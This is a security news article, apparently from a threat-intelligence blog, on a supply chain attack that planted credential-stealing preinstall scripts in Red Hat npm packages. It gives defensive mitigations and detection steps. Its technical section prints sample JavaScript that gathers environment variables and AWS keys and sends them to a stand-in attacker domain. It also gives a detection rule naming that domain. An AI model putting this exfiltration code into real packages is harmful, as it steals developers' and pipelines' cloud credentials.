Red Hat npm Packages Compromised In Credential Theft Attack

Multiple npm packages maintained by Red Hat were compromised in a sophisticated supply chain attack dubbed “Miasma.” Attackers gained unauthorized access to Red Hat developer credentials and injected malicious preinstall scripts designed to harvest environment variables, AWS credentials, and other sensitive data. The malicious code executed automatically during package installation, affecting developers and CI/CD pipelines worldwide. Red Hat has revoked compromised packages and published clean versions, but organizations must audit their environments for potential credential exposure.

Introduction

The open-source ecosystem faces another critical supply chain compromise, this time targeting Red Hat’s npm packages. Security researchers discovered malicious code embedded in several packages maintained by Red Hat developers, designed to exfiltrate credentials and sensitive environment data during the installation process. The attack, identified as the “Miasma” campaign, represents a textbook example of how compromised developer credentials can cascade into widespread supply chain contamination.

Unlike traditional package typosquatting or dependency confusion attacks, this compromise targeted legitimate packages with established user bases. The attackers leveraged stolen credentials to publish malicious versions that appeared authentic, bypassing the trust mechanisms developers rely on when installing packages from verified publishers.

The incident highlights the persistent vulnerability of the npm ecosystem to credential-based attacks and underscores the critical importance of protecting developer accounts with multi-factor authentication and continuous monitoring.

Background & Context

The Miasma campaign emerged in late 2024, discovered through automated supply chain monitoring systems that detected suspicious preinstall script modifications in several Red Hat-maintained packages. The affected packages had varying levels of adoption, from niche utilities to more widely deployed developer tools.

Red Hat maintains numerous open-source projects and npm packages as part of its commitment to the developer community. These packages are trusted components in many enterprise development workflows, making them high-value targets for supply chain attackers. The company’s reputation and the inherent trust in Red Hat-branded packages created an ideal camouflage for malicious payloads.

The attack vector centered on compromised npm account credentials belonging to Red Hat developers. Once attackers obtained these credentials—likely through phishing, credential stuffing, or information stealer malware—they could publish new package versions without raising immediate red flags. The npm registry’s design treats authenticated publishers as trusted, meaning malicious versions appeared as legitimate updates.

Supply chain attacks targeting npm have increased dramatically over recent years, with researchers documenting thousands of malicious packages annually. However, compromises of established, legitimate packages remain relatively rare compared to typosquatting and fake packages, making this incident particularly noteworthy.

Technical Breakdown

The malicious payload embedded in compromised Red Hat packages utilized npm’s preinstall script functionality. This lifecycle hook executes automatically before package installation completes, providing attackers with code execution on target systems without requiring explicit user interaction beyond running npm install.

The malicious preinstall script contained obfuscated JavaScript designed to:

// Simplified representation of malicious behavior
const fs = require('fs');
const https = require('https');
const os = require('os');

// Harvest environment variables
const envData = process.env;

// Target AWS credentials
const awsCreds = {
  key: process.env.AWS_ACCESS_KEY_ID,
  secret: process.env.AWS_SECRET_ACCESS_KEY,
  token: process.env.AWS_SESSION_TOKEN
};

// Collect system information
const systemInfo = {
  hostname: os.hostname(),
  platform: os.platform(),
  user: os.userInfo(),
  cwd: process.cwd()
};

// Exfiltrate data to attacker-controlled endpoint
const payload = Buffer.from(JSON.stringify({
  env: envData,
  aws: awsCreds,
  system: systemInfo
})).toString('base64');

https.get(https://attacker-c2-domain.com/collect?d=${payload});

The actual implementation employed multiple obfuscation layers, including base64 encoding, string concatenation, and dynamic function construction to evade static analysis. The code also implemented anti-debugging checks and conditional execution to avoid detection in sandboxed analysis environments.

The exfiltration endpoint rotated through multiple domains and IP addresses, utilizing bulletproof hosting infrastructure to maintain persistence. Data transmission occurred over HTTPS to blend with legitimate traffic and avoid triggering network security tools.

The attackers published malicious versions with seemingly benign version bumps, taking advantage of developers using flexible version ranges in package.json files. Systems configured with ^ or ~ version specifiers automatically pulled the compromised versions during installation or update operations.

Impact & Risk Assessment

The Miasma campaign poses severe risks across multiple dimensions:

Credential Exposure: The primary impact involves widespread credential harvesting. Any environment where compromised packages were installed potentially leaked AWS keys, API tokens, private keys, database credentials, and other sensitive data stored in environment variables. This exposure could enable follow-on attacks including cloud resource compromise, data breaches, and lateral movement.

CI/CD Pipeline Compromise: Automated build systems represent particularly high-value targets. CI/CD environments typically contain elevated credentials with broad access to production infrastructure. A single infected build pipeline could expose credentials capable of compromising entire cloud environments or deployment infrastructure.

Supply Chain Contamination: Applications built using compromised packages may have embedded malicious code in their distributions, potentially affecting downstream users. While the preinstall scripts execute during development rather than runtime, the possibility of persistent backdoors remains a concern pending thorough code review.

Scope Uncertainty: Determining the full scope of affected systems remains challenging. Package installation telemetry may not capture all instances, particularly in air-gapped environments or systems with modified npm configurations. Organizations must assume compromise and conduct defensive credential rotation.

Reputational Damage: The incident impacts trust in Red Hat-maintained packages and raises broader questions about npm ecosystem security. Developer confidence in supply chain integrity suffers with each high-profile compromise.

The attack window—from initial malicious publication to discovery and revocation—determined actual victim count. Even brief exposure windows can affect thousands of installations in globally distributed development environments.

Vendor Response

Red Hat responded rapidly following discovery of the compromise:

The company immediately revoked compromised npm package versions and published clean releases with incremented version numbers. Red Hat security teams conducted forensic analysis to determine the scope of credential compromise and identify the attack’s entry vector.

In public statements, Red Hat acknowledged the compromise and provided transparency about affected packages. The company implemented mandatory password resets for potentially compromised developer accounts and enforced multi-factor authentication across all npm publishing accounts.

Red Hat published security advisories containing:

• Complete list of affected package names and malicious version numbers
• Indicators of compromise for detection
• Recommended remediation steps
• Timeline of compromise and discovery

The company coordinated with npm registry operators to ensure malicious versions were unlisted and prevented from future installation. Red Hat also engaged with security research community to share malware samples and enable broader analysis.

Long-term improvements announced include enhanced code review processes for package publications, mandatory 2FA for all maintainers, and implementation of npm package signing to verify authenticity.

Mitigations & Workarounds

Organizations should implement immediate remediation steps:

Identify Affected Systems: Audit all development environments, build servers, and CI/CD pipelines for compromised package installations. Check package-lock.json files for specific malicious versions:

# Search for potentially affected packages
find . -name "package-lock.json" -exec grep -l "compromised-package-name" {} \;

# Review installed versions
npm list --depth=0 | grep -E "(package1|package2|package3)"

Rotate All Credentials: Assume compromise and rotate all credentials that may have been exposed in environment variables:

• AWS access keys and secrets
• API tokens and service credentials
• Database passwords
• SSH keys and certificates
• Third-party service credentials

Update to Clean Versions: Immediately update to patched package versions published by Red Hat. Use exact version pinning to prevent automatic installation of potentially malicious updates:

{
  "dependencies": {
    "package-name": "1.2.4"
  }
}

Review Audit Logs: Examine cloud provider logs, access logs, and authentication records for suspicious activity indicating credential misuse during the exposure window.

Scan for Persistence: Conduct thorough security scans for backdoors, additional malware, or persistence mechanisms that may have been deployed using stolen credentials.

Detection & Monitoring

Implement detection capabilities to identify compromise indicators:

Network Monitoring: Monitor for connections to known malicious domains associated with Miasma infrastructure:

# Example network monitoring rule
alert tcp any any -> any 443 (msg:"Miasma C2 Communication"; 
  content:"attacker-c2-domain.com"; nocase; 
  classtype:trojan-activity; sid:1000001;)

File Integrity Monitoring: Monitor node_modules directories for unexpected modifications, particularly to preinstall scripts:

# Generate baseline checksums
find node_modules -name "package.json" -exec sha256sum {} \; > baseline.txt

# Compare against baseline
find node_modules -name "package.json" -exec sha256sum {} \; | diff baseline.txt -

Process Monitoring: Detect suspicious child processes spawned during npm install operations, particularly network connections initiated by installation scripts.

Dependency Auditing: Implement automated tools like npm audit, Snyk, or Socket.dev to continuously monitor dependencies for known malicious packages.

Credential Monitoring: Deploy secret scanning tools to detect exposed credentials in code repositories and monitor for unauthorized usage of API keys and access tokens.

Best Practices

Strengthen supply chain security posture through comprehensive controls:

Multi-Factor Authentication: Enforce MFA on all package registry accounts. This single control could have prevented the Miasma compromise entirely.

Least Privilege Environment Variables: Minimize credentials stored in environment variables. Use credential management solutions like AWS Secrets Manager, HashiCorp Vault, or cloud provider IAM roles.

Dependency Pinning: Use exact version specifications rather than ranges to prevent automatic installation of malicious updates:

{
  "dependencies": {
    "package": "1.2.3"
  }
}

Script Execution Controls: Disable automatic execution of install scripts in high-security environments:

npm install --ignore-scripts

Private Registry Proxying: Route npm installations through private registries with security scanning and approval workflows.

Software Bill of Materials: Maintain comprehensive SBOM documentation for all dependencies to enable rapid vulnerability response.

Sandboxed Build Environments: Isolate build processes in containers or VMs with minimal credential access and strict network egress filtering.

Regular Dependency Audits: Conduct periodic security reviews of all dependencies, removing unused packages and updating to supported versions.

Security Training: Educate developers about supply chain risks, phishing threats targeting credentials, and secure package management practices.

Key Takeaways

• Compromised Red Hat npm packages contained credential-stealing malware targeting environment variables and AWS credentials
• Attackers leveraged stolen developer credentials to publish malicious versions of legitimate packages
• Preinstall scripts provided automatic code execution during package installation
• Organizations must rotate all potentially exposed credentials and audit for compromise indicators
• Multi-factor authentication on registry accounts is essential for preventing credential-based package compromises
• Supply chain security requires defense-in-depth including least privilege, sandboxing, and continuous monitoring
• The npm ecosystem remains vulnerable to sophisticated supply chain attacks targeting trusted publishers

References

• Red Hat Security Advisory – npm Package Compromise (2024)
• npm Registry Security Incident Report
• Miasma Campaign Technical Analysis – Security Research Community
• npm Install Script Security Best Practices
• NIST Software Supply Chain Security Guidelines
• OpenSSF Package Repository Security Framework
• Cloud Provider Credential Security Documentation

Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/